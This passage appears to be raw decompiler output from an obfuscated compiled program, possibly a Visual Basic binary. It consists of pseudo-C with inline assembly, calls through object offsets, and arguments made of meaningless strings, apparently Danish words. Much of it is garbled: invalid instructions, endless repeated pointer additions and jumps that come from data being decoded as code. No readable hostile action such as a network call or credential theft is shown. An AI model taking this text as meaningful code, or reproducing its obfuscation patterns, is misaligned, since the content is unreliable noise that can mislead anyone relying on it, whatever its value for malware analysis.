										 *_t812 =  *_t812 + _t812;
										asm("movsb");
										_t813 = _t812 & 0xffff0040;
										asm("invalid");
										 *_t813 =  *_t813 + _t813;
										 *_t813 =  *_t813 + _t813;
										 *_t813 =  *_t813 + _t813;
										 *_t813 =  *_t813 + _t813;
										_t814 = _t813 + 1;
										 *_t814 =  *_t814 & _t814;
										_t815 = _t814 & 0xffff0040;
										asm("invalid");
										_t1191 = _t815 *  *_t1160 >> 0x20;
										_t817 = _t815 *  *_t1160 + 1;
										 *_t817 =  *_t817 + _t1191;
										asm("sbb eax, 0x44004022");
										_t1215 = _t814;
										_t820 = _t817 &  *_t817 &  *(_t817 &  *_t817) &  *(_t817 &  *_t817 &  *(_t817 &  *_t817));
										_t1237 =  *_t1191 * 0x40;
										_v1191165918 = _v1191165918 + _t820;
										 *_t1191 =  *_t1191 << _t1160;
										asm("in eax, dx");
										asm("adc al, 0x23");
										_t826 = ((_t820 &  *_t820) + 0x00000001 + (_t820 &  *_t820) + 0x00000001 &  *((_t820 &  *_t820) + 1 + (_t820 &  *_t820) + 1) &  *((_t820 &  *_t820) + 0x00000001 + (_t820 &  *_t820) + 0x00000001 &  *((_t820 &  *_t820) + 1 + (_t820 &  *_t820) + 1))) + 1;
										 *_t1160 =  *_t1160 + _t826;
										_push(_t1223 +  *((intOrPtr*)(_t814 + _t814 - 0x4c)));
										asm("outsd");
										 *_t1150 = _t1237;
										 *((intOrPtr*)(_t1215 - 0x4fffbfdd)) =  *((intOrPtr*)(_t1215 - 0x4fffbfdd)) + _t1191;
										_t831 = (_t826 &  *_t826 &  *(_t826 &  *_t826) &  *(_t826 &  *_t826 &  *(_t826 &  *_t826))) + 0x00000001 &  *((_t826 &  *_t826 &  *(_t826 &  *_t826) &  *(_t826 &  *_t826 &  *(_t826 &  *_t826))) + 1);
										 *_t831 =  *_t831 & _t831;
										goto 0x3406116;
										 *_t1209 =  *_t1209 + _t1191;
										_push(_t1160);
										_t836 = (_t831 &  *_t831) -  *_t1191 + 0x00000001 &  *((_t831 &  *_t831) -  *_t1191 + 1) &  *((_t831 &  *_t831) -  *_t1191 + 0x00000001 &  *((_t831 &  *_t831) -  *_t1191 + 1));
										if(_t836 >= 0) {
											 *((intOrPtr*)(_t1191 - 0x60ffbfde)) =  *((intOrPtr*)(_t1191 - 0x60ffbfde)) + _t1191;
											asm("lodsb");
											asm("invalid");
											_t1191 = _t1150 + _t1191;
											_pop(es);
											_t836 = ((_t836 + 0x00000001 &  *(_t836 + 1) &  *(_t836 + 0x00000001 &  *(_t836 + 1))) + 0x00000001 &  *((_t836 + 0x00000001 &  *(_t836 + 1) &  *(_t836 + 0x00000001 &  *(_t836 + 1))) + 1) &  *((_t836 + 0x00000001 &  *(_t836 + 1) &  *(_t836 + 0x00000001 &  *(_t836 + 1))) + 0x00000001 &  *((_t836 + 0x00000001 &  *(_t836 + 1) &  *(_t836 + 0x00000001 &  *(_t836 + 1))) + 1)) &  *[cs:eax]) + 1;
											 *((intOrPtr*)(_t836 + 0x23)) =  *((intOrPtr*)(_t836 + 0x23)) + _t1160;
										}
										asm("bound esp, [ebx]");
										_t839 = (_t836 - 0x00000001 &  *(_t836 - 1)) + 1;
										_t1150[0x10] = _t1150 + _t1150[0x10];
										 *((intOrPtr*)(_t1150 - 0x35ffbfdd)) =  *((intOrPtr*)(_t1150 - 0x35ffbfdd)) + _t839;
										asm("xlatb");
										_t841 = _t839 &  *_t839 &  *(_t839 &  *_t839);
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										if( *_t841 >= 0) {
											_pop(ds);
											 *((intOrPtr*)(_t1215 - 0x3bffbfea)) =  *((intOrPtr*)(_t1215 - 0x3bffbfea)) + _t1150;
											_push(ss);
											_push(ss);
											_t841 = _t1150 + _t841 + 1 + 3;
											 *_t841 =  *_t841 + _t841;
											 *_t841 =  *_t841 + _t841;
											 *_t841 =  *_t841 + _t841;
											 *_t841 =  *_t841 + _t841;
											 *_t841 =  *_t841 + _t841;
											 *_t841 =  *_t841 + _t841;
											 *_t841 =  *_t841 + _t841;
											 *_t841 =  *_t841 + _t841;
										}
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										 *_t841 =  *_t841 + _t841;
										asm("aam 0x21");
										_t1151 = _t1150 + _t1160;
										_t843 = _t841 + 0x00000001 &  *(_t841 + 1);
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										 *_t843 =  *_t843 + _t843;
										_v54 = _v54 - 0x33;
										_t1238 = _t1237 - 0xc;
										 *[fs:0x0] = _t1238;
										L004014F0();
										_v74 = _t1238;
										_v70 = 0x401268;
										_v66 = _v54 & 0x00000001;
										_v54 = _v54 & 0x000000fe;
										 *((intOrPtr*)( *_v54 + 4))(_v54, _t1209, _t1215, _t1151,  *[fs:0x0], 0x4014f6, 0xdc004023);
										if( *0x41333c != 0) {
											_v208 = 0x41333c;
										} else {
											_push(0x41333c);
											_push(0x40276c);
											L004016B8();
											_v208 = 0x41333c;
										}
										_t187 =  &_v208; // 0x41333c
										_v184 =  *((intOrPtr*)( *_t187));
										_t858 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v132);
										asm("fclex");
										_v188 = _t858;
										if(_v188 >= 0) {
											_v212 = _v212 & 0x00000000;
										} else {
											_push(0x14);
											_push(0x40275c);
											_push(_v184);
											_push(_v188);
											L004016B2();
											_v212 = _t858;
										}
										_v192 = _v132;
										_t863 =  *((intOrPtr*)( *_v192 + 0x78))(_v192,  &_v136);
										asm("fclex");
										_v196 = _t863;
										if(_v196 >= 0) {
											_v216 = _v216 & 0x00000000;
										} else {
											_push(0x78);
											_push(0x40277c);
											_push(_v192);
											_push(_v196);
											L004016B2();
											_v216 = _t863;
										}
										_v36 = _v136;
										L004016AC();
										_v160 =  *0x401264;
										_v156 =  *0x401260;
										_v172 =  *0x401258;
										 *_t1238 =  *0x401254;
										 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x937, 0x1c4a,  &_v172,  &_v156, 0x1ea6f2,  &_v132, 0x3fc073,  &_v160,  &_v164);
										_v72 = _v164;
										_v140 = 0x23bb;
										_v136 = 0x4c55;
										_t876 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v136,  &_v140);
										_v184 = _t876;
										if(_v184 >= 0) {
											_v220 = _v220 & 0x00000000;
										} else {
											_push(0x6f8);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v220 = _t876;
										}
										_v140 = 0x4a54;
										L004016A6();
										L004016A6();
										_v172 = 0x20a09d70;
										_v168 = 0x5afe;
										_v136 = 0xdbf;
										_v156 =  *0x401250;
										 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v156,  &_v136,  &_v172,  &_v124, 0x6a5f8a,  &_v128,  &_v140, L"nonleaded");
										L004016A0();
										_t1239 = _t1238 + 0xc;
										_v160 =  *0x40124c;
										_v140 = 0x3cfc;
										_v136 = 0x4fc;
										_v156 =  *0x401248;
										_t895 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v156,  &_v136,  &_v140, 0x5930, 0x632350f0, 0x5afb,  &_v160, 0x6faf64,  &_v164, 2,  &_v124,  &_v128);
										_v184 = _t895;
										if(_v184 >= 0) {
											_v224 = _v224 & 0x00000000;
										} else {
											_push(0x6fc);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v224 = _t895;
										}
										_v68 = _v164;
										_v136 = 0xa93;
										_v160 =  *0x401244;
										_v156 =  *0x401240;
										_t903 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x4319,  &_v156,  &_v160,  &_v136, 0x534262, L"COORDINATORY", 0xafdb4ec0, 0x5af6,  &_v172);
										_v184 = _t903;
										if(_v184 >= 0) {
											_v228 = _v228 & 0x00000000;
										} else {
											_push(0x700);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v228 = _t903;
										}
										_v100 = _v172;
										_v96 = _v168;
										 *((intOrPtr*)( *_a4 + 0x750))(_a4);
										_v172 = 0xb73d9430;
										_v168 = 0x5afa;
										_v156 = 0x71b51e;
										 *((intOrPtr*)( *_a4 + 0x754))(_a4,  &_v156, 0x646b, L"Rapportopgaveer",  &_v172,  &_v136);
										_v64 = _v136;
										_v156 = 0x19a9ec;
										_v136 = 0x74b1;
										L004016A6();
										_v172 =  *0x401238;
										_t923 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, L"UDSENDELSESLEDERENS", L"Princesslike2",  &_v172, 0x75993920, 0x5b05,  &_v124, 0x7965ca,  &_v136, 0x6c83,  &_v156,  &_v180);
										_v184 = _t923;
										if(_v184 >= 0) {
											_v232 = _v232 & 0x00000000;
										} else {
											_push(0x704);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v232 = _t923;
										}
										_v32 = _v180;
										_v28 = _v176;
										L0040169A();
										L004016A6();
										_v136 = 0x7f6;
										_v160 = 0x85e0a5;
										L004016A6();
										_v156 = 0x81e999;
										 *((intOrPtr*)( *_a4 + 0x758))(_a4, 0x5b262c,  &_v156, 0x4de434a0, 0x5b07,  &_v124, L"Ciceronically",  &_v160,  &_v136,  &_v128,  &_v140);
										_v76 = _v140;
										L004016A0();
										_t1240 = _t1239 + 0xc;
										_t940 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 2,  &_v124,  &_v128);
										_v184 = _t940;
										if(_v184 >= 0) {
											_v236 = _v236 & 0x00000000;
										} else {
											_push(0x708);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v236 = _t940;
										}
										_v152 = 0x2e49;
										_v172 =  *0x401230;
										_v148 = 0x47eb;
										_v144 = 0x4944;
										_v140 = 0x4cd7;
										_v136 = 0x72a9;
										_t949 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v136, 0x20ce,  &_v140,  &_v144, 0x16c328,  &_v148,  &_v172,  &_v152);
										_v184 = _t949;
										if(_v184 >= 0) {
											_v240 = _v240 & 0x00000000;
										} else {
											_push(0x70c);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v240 = _t949;
										}
										_v136 = 0x58da;
										 *((intOrPtr*)( *_a4 + 0x75c))(_a4, L"brysthulernes",  &_v136,  &_v140);
										_v92 = _v140;
										L004016A6();
										L004016A6();
										_t960 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v124, 0x1ea6f2,  &_v128);
										_v184 = _t960;
										if(_v184 >= 0) {
											_v244 = _v244 & 0x00000000;
										} else {
											_push(0x710);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v244 = _t960;
										}
										L004016A0();
										_t1241 = _t1240 + 0xc;
										L004016A6();
										_v160 = 0x4c041c;
										_v172 = 0x950d78b0;
										_v168 = 0x5af7;
										_t1171 =  &_v124;
										L004016A6();
										_v156 = 0x6b48d8;
										 *_t1241 =  *0x401228;
										 *_t1241 =  *0x401220;
										 *((intOrPtr*)( *_a4 + 0x760))(_a4, _t1171, _t1171,  &_v156,  &_v124, _t1171, _t1171,  &_v172,  &_v160, 0x2df651, 0x6ba0, 0x106f,  &_v128, 2,  &_v124,  &_v128);
										L004016A0();
										_t1242 = _t1241 + 0xc;
										_v156 = 0x4bf5be;
										L004016A6();
										_t1173 =  &_v124;
										L004016A6();
										_v172 = 0x7df0fff0;
										_v168 = 0x5afa;
										 *_t1242 =  *0x401218;
										 *((intOrPtr*)( *_a4 + 0x764))(_a4, 0x55d653,  &_v172, 0x5d62, 0x329d,  &_v124, _t1173, _t1173,  &_v128, L"Neapolitanernes9", L"Femaaret1",  &_v156, 2,  &_v124,  &_v128);
										L004016A0();
										_t1243 = _t1242 + 0xc;
										_v144 = 0x6589;
										_v140 = 0x592a;
										_v136 = 0xc7f;
										_v172 = 0xcd64b2a0;
										_v168 = 0x5b06;
										 *_t1243 =  *0x401210;
										 *_t1243 =  *0x401208;
										 *((intOrPtr*)( *_a4 + 0x768))(_a4, 0x703d9a,  &_v172,  &_v136, 0x25b41f,  &_v140, _t1173, _t1173,  &_v144, _t1173, L"BREGNEMOS",  &_v148, 2,  &_v124,  &_v128);
										_v60 = _v148;
										_v160 =  *0x401200;
										_v172 =  *0x4011f8;
										_v156 = 0x498bfd;
										_t997 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v156, L"MARMENNILL",  &_v172, 0x3fdd2e,  &_v160,  &_v180);
										_v184 = _t997;
										if(_v184 >= 0) {
											_v248 = _v248 & 0x00000000;
										} else {
											_push(0x714);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v248 = _t997;
										}
										_v112 = _v180;
										_v108 = _v176;
										_v160 =  *0x4011f0;
										_v136 = 0x668f;
										_v156 = 0x61043c;
										_v180 = 0x31a5ae00;
										_v176 = 0x5afc;
										_v172 = 0x85536c70;
										_v168 = 0x5afe;
										 *_t1243 =  *0x4011e8;
										 *((intOrPtr*)( *_a4 + 0x76c))(_a4,  &_v172, _t1173, _t1173,  &_v180, 0x278f,  &_v156, 0x8a7d0750, 0x5aff,  &_v136,  &_v160, 0x4691,  &_v140);
										_v56 = _v140;
										_v156 =  *0x4011e0;
										_t1014 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v156, 0x64817a,  &_v172);
										_v184 = _t1014;
										if(_v184 >= 0) {
											_v252 = _v252 & 0x00000000;
										} else {
											_push(0x718);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v252 = _t1014;
										}
										_v52 = _v172;
										_v160 = 0x4186f1;
										_v144 = 0x7308;
										_v140 = 0x3cf0;
										_v156 = 0x80397e;
										_v136 = 0x67df;
										 *_t1243 =  *0x4011d8;
										_t1022 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, L"STRUKTURELLES", _t1173, _t1173,  &_v136, 0x7c54d2,  &_v156,  &_v140, 0x4d1ba3,  &_v144, 0x22e85140, 0x5b03,  &_v160);
										_v184 = _t1022;
										if(_v184 >= 0) {
											_v256 = _v256 & 0x00000000;
										} else {
											_push(0x71c);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v256 = _t1022;
										}
										_v156 =  *0x4011d4;
										 *_t1243 =  *0x4011d0;
										_t1027 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x8a636, L"Unimputed7", _t1173,  &_v156,  &_v172);
										_v184 = _t1027;
										if(_v184 >= 0) {
											_v260 = _v260 & 0x00000000;
										} else {
											_push(0x720);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v260 = _t1027;
										}
										_v88 = _v172;
										_v172 =  *0x4011c8;
										_v156 = 0x3f4761;
										 *_t1243 =  *0x4011c0;
										_t552 =  &_v156; // 0x3f4761
										 *_t1243 =  *0x4011b8;
										 *((intOrPtr*)( *_a4 + 0x770))(_a4, 0x4855a1f0, 0x5afc, _t1173, _t1173, _t552, _t1173,  &_v172,  &_v180);
										_v120 = _v180;
										_v160 = 0x161041;
										_v136 = 0x5ce9;
										_v172 = 0x7df0fff0;
										_v168 = 0x5afa;
										_v156 =  *0x4011b0;
										 *_t1243 =  *0x401218;
										_t566 =  &_v156; // 0x3f4761
										 *((intOrPtr*)( *_a4 + 0x774))(_a4, _t566, _t1173, _t1173,  &_v172,  &_v136, 0x65f8fe, 0x26ce, 0x1837,  &_v160);
										_v172 =  *0x4011a8;
										_v156 = 0x61246;
										_t1045 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v156, L"mindedigtet",  &_v172);
										_v184 = _t1045;
										if(_v184 >= 0) {
											_v264 = _v264 & 0x00000000;
										} else {
											_push(0x724);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v264 = _t1045;
										}
										_t1049 =  *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v136);
										_v184 = _t1049;
										if(_v184 >= 0) {
											_v268 = _v268 & 0x00000000;
										} else {
											_push(0x728);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v268 = _t1049;
										}
										_v104 = _v136;
										 *((intOrPtr*)( *_a4 + 0x778))(_a4);
										_v136 = 0x6da8;
										_t1174 =  &_v124;
										L004016A6();
										_v156 = 0x2cc3e3;
										 *_t1243 =  *0x4011a0;
										 *_t1243 =  *0x401198;
										 *((intOrPtr*)( *_a4 + 0x77c))(_a4,  &_v156, _t1174, _t1174,  &_v124, _t1174,  &_v136);
										L0040169A();
										_v136 = 0xb3e;
										 *((intOrPtr*)( *_a4 + 0x780))(_a4, 0x4ff843, L"ACROMIOCLAVICULAR",  &_v136, 0x6800);
										_v160 =  *0x401190;
										_t1176 =  &_v124;
										L004016A6();
										_v180 =  *0x401188;
										_v156 =  *0x401184;
										_v172 = 0xb7b19540;
										_v168 = 0x5b06;
										_v136 = 0x435;
										 *_t1243 =  *0x401180;
										 *_t1243 =  *0x401178;
										_t1073 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v136,  &_v172,  &_v156, 0xb598d620, 0x5b00,  &_v180, _t1176, _t1176,  &_v124, _t1176,  &_v160,  &_v164);
										_v184 = _t1073;
										if(_v184 >= 0) {
											_v272 = _v272 & 0x00000000;
										} else {
											_push(0x72c);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v272 = _t1073;
										}
										_v80 = _v164;
										_t1177 =  &_v124;
										L0040169A();
										 *((intOrPtr*)( *_a4 + 0x784))(_a4);
										_t1080 =  *((intOrPtr*)( *_a4 + 0x730))(_a4);
										_v184 = _t1080;
										if(_v184 >= 0) {
											_v276 = _v276 & 0x00000000;
										} else {
											_push(0x730);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v276 = _t1080;
										}
										 *_t1243 =  *0x401174;
										 *((intOrPtr*)( *_a4 + 0x788))(_a4, _t1177, 0x5d86fe);
										_v156 =  *0x401170;
										_v136 = 0x61ea;
										_t1088 =  *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v136,  &_v156, 0x60a7, 0x183aac);
										_v184 = _t1088;
										if(_v184 >= 0) {
											_v280 = _v280 & 0x00000000;
										} else {
											_push(0x734);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v280 = _t1088;
										}
										_v136 = 0x48e2;
										L004016A6();
										_t1093 =  *((intOrPtr*)( *_a4 + 0x738))(_a4, L"UNGDOMSFNGSELS",  &_v124, 0x6da9aa, 0x1b6865, 0x81a23630, 0x5afc, 0x737aa,  &_v136);
										_v184 = _t1093;
										if(_v184 >= 0) {
											_v284 = _v284 & 0x00000000;
										} else {
											_push(0x738);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v284 = _t1093;
										}
										L0040169A();
										_v156 =  *0x4011f0;
										 *((intOrPtr*)( *_a4 + 0x78c))(_a4,  &_v156, 0x61043c,  &_v172);
										_v44 = _v172;
										_v136 = 0x4ecb;
										_v172 =  *0x401168;
										 *_t1243 =  *0x401160;
										_t1103 =  *((intOrPtr*)( *_a4 + 0x73c))(_a4,  &_v172,  &_v124, 0xfedb0060, 0x5af6, 0x64e5,  &_v136, 0x22ad);
										_v184 = _t1103;
										if(_v184 >= 0) {
											_v288 = _v288 & 0x00000000;
										} else {
											_push(0x73c);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v288 = _t1103;
										}
										_t1180 =  &_v124;
										L004016A6();
										_v136 = 0x214d;
										_v156 = 0x665416;
										_v172 =  *0x401158;
										 *_t1243 =  *0x401150;
										 *_t1243 =  *0x401148;
										_t1110 =  *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v172,  &_v156, _t1180, _t1180,  &_v136, _t1180, _t1180,  &_v124, 0x3b8b);
										_v184 = _t1110;
										if(_v184 >= 0) {
											_v292 = _v292 & 0x00000000;
										} else {
											_push(0x740);
											_push(0x402594);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v292 = _t1110;
										}
										L0040169A();
										_t1113 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
										asm("fclex");
										_v184 = _t1113;
										if(_v184 >= 0) {
											_v296 = _v296 & 0x00000000;
										} else {
											_push(0x1bc);
											_push(0x402564);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v296 = _t1113;
										}
										_t1117 =  *((intOrPtr*)( *_a4 + 0x790))(_a4,  &_v156);
										_v8 = 0;
										asm("wait");
										_push(0x40fd19);
										return _t1117;
									}
									_push(_t1190);
									if(_t1323 < 0) {
										goto L55;
									}
									asm("popad");
									if(_t1323 == 0) {
										goto L56;
									}
									if(_t1323 < 0) {
										L53:
										 *_t810 =  *_t810 + _t810;
										 *_t810 =  *_t810 + _t810;
										 *_t810 =  *_t810 + _t810;
										 *_t810 =  *_t810 + _t810;
										 *_t810 =  *_t810 + _t810;
										if( *_t810 < 0) {
											goto L61;
										}
										goto L54;
									}
									_t1277 =  *(_t1190 + 0x2e) * 0x61746144;
									L44:
									if(_t1277 == 0) {
										goto L57;
									}
									_push(_t1190);
									if(_t1277 < 0) {
										goto L58;
									}
									asm("popad");
									if(_t1277 == 0) {
										goto L59;
									}
									L47:
									if (_t1277 < 0) goto L48;
									asm("popad");
									if(_t1277 == 0) {
										goto L60;
									} else {
										_push(_t1190);
										if(_t1277 < 0) {
											goto L62;
										}
										asm("popad");
										if(_t1277 == 0) {
											goto L63;
										}
										if (_t1277 < 0) goto L52;
										_t1152 = _t1150 - 1;
										_t1129 = _t810 +  *_t810;
										 *((intOrPtr*)(_t1152 + 1)) =  *((intOrPtr*)(_t1152 + 1)) + _t1160;
										 *_t1129 =  *_t1129 + _t1129;
										_t1131 = _t1129 + _t1152 &  *(_t1129 + _t1152);
										 *_t1131 =  *_t1131 + _t1131;
										 *_t1131 =  *_t1131 + _t1131;
										_t1132 = _t1131 + 1;
										asm("in al, 0x40");
										_t1150 = _t1152 + _t1152;
										asm("invalid");
										 *_t1132 =  *_t1132 + 1;
										 *_t1132 =  *_t1132 + _t1132;
										 *_t1132 =  *_t1132 + _t1190;
										_t810 = _t1132 & 0x00000040;
										 *_t810 =  *_t810 + _t1160;
										 *_t1160 =  *_t1160 ^ _t810;
										 *_t810 =  *_t810 + _t810;
										 *_t810 =  *_t810 + _t810;
										_push(_t810);
										 *_t810 =  *_t810 + _t810;
										goto L53;
									}
								}
								_push(0x60);
								asm("outsd");
								if(_t1276 != 0) {
									goto L39;
								}
								asm("arpl [ebp], sp");
								asm("popad");
								if(_t1276 == 0) {
									goto L38;
								}
								_t1223 =  &_v1;
								asm("gs insd");
								asm("bound esp, [ebp+0x72]");
								 *((intOrPtr*)(_t1160 + 0x74)) =  *((intOrPtr*)(_t1160 + 0x74)) + _t810;
								asm("popad");
								_t1277 = 0x449a3cb1;
								asm("outsd");
								if(0x449a3cb1 < 0) {
									goto L44;
								}
								asm("popad");
								if(0x449a3cb1 == 0) {
									goto L47;
								}
								 *0x60 =  *0x60 + _t810;
								_t1190 = _t1190 + 1;
								 *0x449a3cb1 =  *0x449a3cb1 + _t1190;
								 *_t1190 =  *_t1190 + _t810;
								_t1133 = _t810 ^  *_t810;
								_t1150 = 0x61;
								 *_t1160 =  *_t1160 + 0x60;
								 *_t1133 =  *_t1133 + _t1190;
								 *0x39004500 =  *0x39004500 + _t1160;
								 *_t1190 =  *_t1190 + _t1190;
								 *_t1209 =  *_t1209 + _t1190;
								 *0x31003100 =  *0x31003100 + _t1160;
								 *((intOrPtr*)(_t1133 + _t1133 + 0x31)) =  *((intOrPtr*)(_t1133 + _t1133 + 0x31)) + _t1133;
								 *0x43003800 =  *0x43003800 + _t1160;
								 *_t1160 =  *_t1160 + _t1190;
								 *_t1190 =  *_t1190 + _t1133;
								_t810 = _t1133 - 0x30003000;
								 *_t810 =  *_t810 + _t1190;
								 *_t810 =  *_t810 + _t1190;
								 *0x449A3CB1 =  *((intOrPtr*)(0x449a3cb1)) + _t810;
								asm("aaa");
								 *0x44003400 =  *0x44003400 + _t1190;
								goto L37;
							}
							 *_t755 =  *_t755 + _t755;
							asm("outsd");
							do {
								asm("insb");
								asm("outsd");
								_t1134 =  *(_t1146 + _t1212) * 0xf4000000;
								 *_t1134 =  *_t1134 + _t1134;
								_t1136 = _t1134 + _t1146 &  *(_t1134 + _t1146);
								 *_t1136 =  *_t1136 + _t1136;
								 *_t1136 =  *_t1136 + _t1136;
							} while ( *_t1136 < 0);
							_t1137 = _t1136 + 1;
							 *((intOrPtr*)(_t1137 + 0x27)) =  *((intOrPtr*)(_t1137 + 0x27)) + _t1137;
							_t1155 =  &(_t1155[0]);
							_t755 = _t1137 + 0x16;
							asm("adc [eax], eax");
							 *_t755 =  *_t755 + _t1155;
							 *_t1155 =  *_t1155 ^ _t755;
							 *(_t755 + _t755 * 2) =  !( *(_t755 + _t755 * 2));
							 *_t755 =  *_t755 + _t755;
							 *_t1155 =  *_t1155 ^ _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							goto L26;
						}
					}
					asm("outsd");
					if(_t1249 < 0) {
						L11:
						 *_t747 =  *_t747 + _t747;
						goto L12;
					}
					asm("arpl [eax], ax");
					_t747 = _t747 | 0x55000b01;
					_t1250 = _t747;
					asm("outsb");
					if(_t1250 < 0) {
						goto L15;
					}
					asm("outsd");
					if(_t1250 < 0) {
						goto L14;
					}
					_t747 = _t747 ^ 0x00011900;
					_t1185 = _t1185 + 1;
					 *_t1185 =  *_t1185 + _t747;
					_t1230 = _t1230 +  *((intOrPtr*)(_t1155 + _t1145));
					_t15 =  &_a110;
					 *_t15 = _a110 + _t1185;
					_t1251 =  *_t15;
					if(_t1251 < 0) {
						goto L18;
					}
					asm("outsd");
					if(_t1251 < 0) {
						goto L17;
					}
					_t1138 = _t747 ^ 0x13693500;
					 *_t1138 =  *_t1138 + _t1138;
					asm("in eax, 0x13");
					 *_t1138 =  *_t1138 + _t1138;
					asm("sbb byte [0x1d300000], 0x0");
					 *((intOrPtr*)(_t1138 + _t1138 + 0x46)) =  *((intOrPtr*)(_t1138 + _t1138 + 0x46)) + _t1138;
					_t1145 = _t1145 + _t1145;
					_t1139 = _t1138;
					 *_t1139 =  *_t1139 + _t1139;
					_push(es);
					 *_t1139 =  *_t1139 + _t1139;
					_t1141 = _t1139 + _t1145 + 1;
					 *_t1141 =  *_t1141 + _t1185;
					 *_t1141 =  *_t1141 + _t1141;
					_t21 = _t1141 + 0x44;
					_t22 = _t1185;
					_t1185 =  *_t21;
					 *_t21 = _t22;
					_t747 = 0xfe8e047f;
					_t1217 = _t1141;
					asm("adc al, 0x60");
					asm("invalid");
					asm("sbb ch, [edi-0x4c]");
					 *0xfe8e047f =  *0xfe8e047f + 0xfe8e047f;
					 *0xfe8e047f =  *0xfe8e047f + 0xfe8e047f;
					 *0xfe8e047f =  *0xfe8e047f + 0xfe8e047f;
					 *0xfe8e047f =  *0xfe8e047f + 0xfe8e047f;
					 *0xfe8e047f =  *0xfe8e047f + 0xfe8e047f;
					 *0xfe8e047f =  *0xfe8e047f + 0xfe8e047f;
					goto L11;
				}
			}
















































































































































































































                                  0x004016d8
                                  0x004016d8
